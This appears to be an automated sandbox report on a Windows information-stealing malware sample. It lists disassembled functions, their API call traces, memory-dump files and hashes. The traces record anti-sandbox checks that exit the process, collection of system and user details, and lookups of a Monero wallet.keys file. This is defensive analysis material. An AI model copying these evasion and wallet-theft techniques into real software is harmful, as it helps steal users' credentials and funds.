lstrcat.KERNEL32(?,0114E4B0), ref: 0037415B

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: 71d7e4cba977771333f4cdbb1a11a098c210e6f38ac35be64126d7977ccef0c1
Instruction ID: ffbe60d64ea3d0e673e59d4eedef617866213c9a44cb6b642f4747e80881862d
Opcode Fuzzy Hash: 71d7e4cba977771333f4cdbb1a11a098c210e6f38ac35be64126d7977ccef0c1
Instruction Fuzzy Hash: 6E41BD76D0010867DB25EBB0DC46FFE733DA799300F008959B71A5A181EB755B8CCB92

Function 003769F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00379860: GetProcAddress.KERNEL32(74DD0000,01142230), ref: 003798A1
Part of subcall function 00379860: GetProcAddress.KERNEL32(74DD0000,01142428), ref: 003798BA
Part of subcall function 00379860: GetProcAddress.KERNEL32(74DD0000,011422D8), ref: 003798D2
Part of subcall function 00379860: GetProcAddress.KERNEL32(74DD0000,01142278), ref: 003798EA
Part of subcall function 00379860: GetProcAddress.KERNEL32(74DD0000,01142248), ref: 00379903
Part of subcall function 00379860: GetProcAddress.KERNEL32(74DD0000,01149048), ref: 0037991B
Part of subcall function 00379860: GetProcAddress.KERNEL32(74DD0000,01135790), ref: 00379933
Part of subcall function 00379860: GetProcAddress.KERNEL32(74DD0000,01135870), ref: 0037994C
Part of subcall function 00379860: GetProcAddress.KERNEL32(74DD0000,011422F0), ref: 00379964
Part of subcall function 00379860: GetProcAddress.KERNEL32(74DD0000,01142488), ref: 0037997C
Part of subcall function 00379860: GetProcAddress.KERNEL32(74DD0000,01142368), ref: 00379995
Part of subcall function 00379860: GetProcAddress.KERNEL32(74DD0000,01142380), ref: 003799AD
Part of subcall function 00379860: GetProcAddress.KERNEL32(74DD0000,01135910), ref: 003799C5
Part of subcall function 00379860: GetProcAddress.KERNEL32(74DD0000,01142398), ref: 003799DE

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Part of subcall function 003611D0: ExitProcess.KERNEL32 ref: 00361211

Part of subcall function 00361160: GetSystemInfo.KERNEL32(?), ref: 0036116A
Part of subcall function 00361160: ExitProcess.KERNEL32 ref: 0036117E

Part of subcall function 00361110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0036112B
Part of subcall function 00361110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00361132
Part of subcall function 00361110: ExitProcess.KERNEL32 ref: 00361143

Part of subcall function 00361220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0036123E
Part of subcall function 00361220: ExitProcess.KERNEL32 ref: 00361294

Part of subcall function 00376770: GetUserDefaultLangID.KERNEL32 ref: 00376774

Part of subcall function 00361190: ExitProcess.KERNEL32 ref: 003611C6

Part of subcall function 00377850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003611B7), ref: 00377880
Part of subcall function 00377850: RtlAllocateHeap.NTDLL(00000000), ref: 00377887
Part of subcall function 00377850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0037789F

Part of subcall function 003778E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00377910
Part of subcall function 003778E0: RtlAllocateHeap.NTDLL(00000000), ref: 00377917
Part of subcall function 003778E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0037792F

Part of subcall function 0037A9B0: lstrlen.KERNEL32(?,011492B8,?,\Monero\wallet.keys,00380E17), ref: 0037A9C5
Part of subcall function 0037A9B0: lstrcpy.KERNEL32(00000000), ref: 0037AA04
Part of subcall function 0037A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0037AA12

Part of subcall function 0037A8A0: lstrcpy.KERNEL32(?,00380E17), ref: 0037A905

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01149098,?,0038110C,?,00000000,?,00381110,?,00000000,00380AEF), ref: 00376ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00376AE8
CloseHandle.KERNEL32(00000000), ref: 00376AF9
Sleep.KERNEL32(00001770), ref: 00376B04
CloseHandle.KERNEL32(?,00000000,?,01149098,?,0038110C,?,00000000,?,00381110,?,00000000,00380AEF), ref: 00376B1A
ExitProcess.KERNEL32 ref: 00376B22

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2931873225-0
Opcode ID: c6369dfb6dda35d12211b8fbce49fe07c9c04131d0955bc74189a18d6d1614c9
Instruction ID: ac6594eba72450686cca522ca32201435dde5b98b9ba3f6346e0de465718e328
Opcode Fuzzy Hash: c6369dfb6dda35d12211b8fbce49fe07c9c04131d0955bc74189a18d6d1614c9
Instruction Fuzzy Hash: BB312D70900608AADB66FBF0DC57BEE7778AF55340F108518F21AAA181DF785905DBA2

Function 003699C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003699EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00369A11
LocalAlloc.KERNEL32(00000040,?), ref: 00369A31
ReadFile.KERNEL32(000000FF,?,00000000,0036148F,00000000), ref: 00369A5A
LocalFree.KERNEL32(0036148F), ref: 00369A90
CloseHandle.KERNEL32(000000FF), ref: 00369A9A

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: a478bb60bb5b24958d03c24e9defc41d60398071fa7ffd3557d80329e33311fe
Instruction ID: fee0e2ecea523e3c4b209652097e0ee915a8d061de6cab6197da6d1d31d01c26
Opcode Fuzzy Hash: a478bb60bb5b24958d03c24e9defc41d60398071fa7ffd3557d80329e33311fe
Instruction Fuzzy Hash: 10313AB4A00209EFDB15CF94C889BAE77F9FF49300F108159E911AB394D778AA45CFA1

Function 00374780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,0114E540), ref: 003747DB

Part of subcall function 00378DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00378E0B

lstrcat.KERNEL32(?,00000000), ref: 00374801
lstrcat.KERNEL32(?,?), ref: 00374820
lstrcat.KERNEL32(?,?), ref: 00374834
lstrcat.KERNEL32(?,0113B7E8), ref: 00374847
lstrcat.KERNEL32(?,?), ref: 0037485B
lstrcat.KERNEL32(?,0114D7A0), ref: 0037486F

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

Part of subcall function 00378D90: GetFileAttributesA.KERNEL32(00000000,?,00361B54,?,?,0038564C,?,?,00380E1F), ref: 00378D9F

Part of subcall function 00374570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00374580
Part of subcall function 00374570: RtlAllocateHeap.NTDLL(00000000), ref: 00374587
Part of subcall function 00374570: wsprintfA.USER32 ref: 003745A6
Part of subcall function 00374570: FindFirstFileA.KERNEL32(?,?), ref: 003745BD

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: 8065e7daaf431156deb102e896e4147f5b000224dd287903842014c623a9a258
Instruction ID: a3a997a330549c208e72d7df55ff7ee7994f0c0a98a209a5bbd1088527b1f3c9
Opcode Fuzzy Hash: 8065e7daaf431156deb102e896e4147f5b000224dd287903842014c623a9a258
Instruction Fuzzy Hash: 343199B294020857CB62F7B0DC85EED737CAB59700F408589B31996081DF78978DCF91

Function 003770D0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 140COMMON

Download Yara Rule

APIs

Part of subcall function 0037A740: lstrcpy.KERNEL32(00380E17,00000000), ref: 0037A788

memset.MSVCRT ref: 0037716A

Strings

s7, xrefs: 003772AE, 00377179, 0037717C
s7, xrefs: 00377111
65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0037718C

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: lstrcpymemset
String ID: s7$s7$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 4047604823-1872119268
Opcode ID: b209f5d39944f8171dedfb326d0e87f3d7abc739b0cd20c535c8006611a3bd0a
Instruction ID: 33a7d644703d01522cc85d96601878729f488582791b53bee6df5a8f197eee1f
Opcode Fuzzy Hash: b209f5d39944f8171dedfb326d0e87f3d7abc739b0cd20c535c8006611a3bd0a
Instruction Fuzzy Hash: 1B5185B0D04218AFDB35EB90DC91BEEB774AF44304F5085A8E5197B182EB786E88CF55

Function 00377E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00377E37
RtlAllocateHeap.NTDLL(00000000), ref: 00377E3E
RegOpenKeyExA.KERNEL32(80000002,0113BEF8,00000000,00020119,?), ref: 00377E5E
RegQueryValueExA.KERNEL32(?,0114D900,00000000,00000000,000000FF,000000FF), ref: 00377E7F
RegCloseKey.ADVAPI32(?), ref: 00377E92

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: 358c6986dcb7e90e0b29912f210c6e7de47951adb7b173b9df9708833e502a92
Instruction ID: 447487a3d277a32e0fed5b5a33d8a519fa6ff9348f204ea4b7a2da05278cc265
Opcode Fuzzy Hash: 358c6986dcb7e90e0b29912f210c6e7de47951adb7b173b9df9708833e502a92
Instruction Fuzzy Hash: B4119EB1A44205EBD715CF94DC49FBBBBBCEB09B00F108159F605A7680D7785804DBA1

Function 003612A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 003612B4
RtlAllocateHeap.NTDLL(00000000), ref: 003612BB
RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 003612D7
RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003612F5
RegCloseKey.ADVAPI32(?), ref: 003612FF

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
